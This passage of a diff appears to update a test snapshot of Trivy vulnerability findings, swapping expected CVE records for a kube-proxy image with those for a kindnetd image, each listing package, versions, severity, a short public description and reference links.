"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", - "https://errata.almalinux.org/8/ALSA-2021-4451.html", - "https://errata.rockylinux.org/RLSA-2021:4451", - "https://linux.oracle.com/cve/CVE-2021-3580.html", - "https://linux.oracle.com/errata/ELSA-2022-9221.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", - "https://security.netapp.com/advisory/ntap-20211104-0006/", - "https://ubuntu.com/security/notices/USN-4990-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3580", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3580", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "libip4tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4451", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "libip6tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4990-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-12290", - "installedVersion": "2.0.5-1+deb10u1", - "packageName": "libidn2-0", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", - "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", - "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", - "https://gitlab.com/libidn/libidn2/merge_requests/71", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", - "https://security.gentoo.org/glsa/202003-63", - "https://ubuntu.com/security/notices/USN-4168-1", - "https://usn.ubuntu.com/4168-1/", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specified in RFC3490 Section 4.2 when converting A-labels to U-labels. This makes it possible in some circumstances for one domain to impersonate another. By creating a malicious domain that matches a target domain except for the inclusion of certain punycoded Unicode characters (that would be discarded when converted first to a Unicode label and then back to an ASCII label), arbitrary domains can be impersonated.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specifi ...", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-12290", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00008.html", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00009.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12290", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://gitlab.com/libidn/libidn2/commit/241e8f486134793cb0f4a5b0e5817a97883401f5", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://gitlab.com/libidn/libidn2/commit/614117ef6e4c60e1950d742e3edf0a0ef8d389de", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://gitlab.com/libidn/libidn2/merge_requests/71", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UFT76Y7OSGPZV3EBEHD6ISVUM3DLARM/", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KXDKYWFV6N2HHVSE67FFDM7G3FEL2ZNE/", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ONG3GJRRJO35COPGVJXXSZLU4J5Y42AT/", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSI4TI2JTQWQ3YEUX5X36GTVGKO4QKZ5/", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U6ZXL2RDNQRAHCMKWPOMJFKYJ344X4HL/", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202003-63", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4168-1", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4168-1/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5800-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5822-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5822-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5828-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5936-1", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/advisories/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], "severity": "HIGH", @@ -160235,437 +160727,459 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip4tc2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip4tc2", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip6tc2", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libip6tc2", - "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", - ], - }, - "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://ubuntu.com/security/notices/USN-5800-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5822-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5822-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5828-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5936-1", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/advisories/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", + }, + { + "type": "URL", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.8.3-1+deb10u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3520", - "installedVersion": "1.8.3-1", - "packageName": "liblz4-1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3520", - "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", - "https://errata.almalinux.org/8/ALSA-2021-2575.html", - "https://errata.rockylinux.org/RLSA-2021:2575", - "https://github.com/lz4/lz4/pull/972", - "https://linux.oracle.com/cve/CVE-2021-3520.html", - "https://linux.oracle.com/errata/ELSA-2021-2575.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", - "https://security.netapp.com/advisory/ntap-20211104-0005/", - "https://ubuntu.com/security/notices/USN-4968-1", - "https://ubuntu.com/security/notices/USN-4968-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3520", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "There's a flaw in lz4. An attacker who submits a 